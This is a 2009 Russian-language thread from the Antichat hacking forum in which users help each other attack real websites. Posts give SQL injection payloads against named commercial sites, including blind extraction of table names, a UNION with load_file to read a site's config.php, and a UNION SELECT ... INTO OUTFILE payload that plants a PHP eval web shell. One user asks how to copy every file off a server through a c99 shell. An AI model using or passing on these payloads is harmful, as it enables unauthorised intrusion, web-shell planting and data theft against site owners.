ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #5001  
Старый 24.01.2009, 22:18
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию

http://www.exportbureau.com/trade_leads.html?lead=99999999999999999999999999
Дальше стоит фильтрация на order by и union select
Че делать?

http://www.tbc-world.com/resprofile.asp?id=-5685946+order+by+25--&lng=en&companytype=2
Вот еще одна конторка. по моему тоже фильтрация стоит.

Последний раз редактировалось molotovkeyt; 24.01.2009 в 22:22..
 

  #5002  
Старый 24.01.2009, 23:07
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Народ есть шелл с99 от маднета
так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
но на сервере стоит виндувс 2008 как тут тогда быть?
 

  #5003  
Старый 24.01.2009, 23:14
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

molotovkeyt, первая ссылка не открывается, вторая:
Цитата:
http://www.tbc-world.com/resprofile.asp?id=5685946+and+ascii(substring((sel ect+top+1+table_name+from+information_schema.table s),1,1))=84--
 

  #5004  
Старый 25.01.2009, 00:06
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от diznt  
Народ есть шелл с99 от маднета
так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
но на сервере стоит виндувс 2008 как тут тогда быть?
Вот, не помню кто вылаживал, скрипт на пхп,http://slil.ru/26579035. Еще можно попробывать архиваторы из unix - версии под windows,например tar, но я хз будет ли он работать под 2008.
 

  #5005  
Старый 25.01.2009, 01:13
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

Код:
<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8"); 
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?>
SAVE_FILES - путь откуда скачиваються файл
 

  #5006  
Старый 25.01.2009, 01:24
_evgeniy_
Новичок
Регистрация: 07.09.2008
Сообщений: 26
Провел на форуме:
430982

Репутация: 26
По умолчанию

Цитата:
Сообщение от diznt  
вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
неполучится скачать, нет SQL-инекции в запросе
 

  #5007  
Старый 25.01.2009, 13:37
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?

Последний раз редактировалось jokester; 25.01.2009 в 13:54.. Причина: Не в ту кнопку ткнул )
 

  #5008  
Старый 25.01.2009, 13:52
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от diznt  
вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

Код:
<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8"); 
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?>
SAVE_FILES - путь откуда скачиваються файл
Цитата:
upload.php?id=-1+union+select+load_file('/folder/config.php'),2--+
первая сточка

Цитата:
тоже нужно переводить в чар?
необязательно (левая часть)

Последний раз редактировалось l1ght; 25.01.2009 в 14:01..
 

  #5009  
Старый 25.01.2009, 13:54
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от kevmen  
http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?
Нужен путь. Так тоже зальёт, но в папку с базой, из веба не увидешь. В чар нельзя путь переводить

'/путь/shell.php'
 

  #5010  
Старый 25.01.2009, 14:00
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ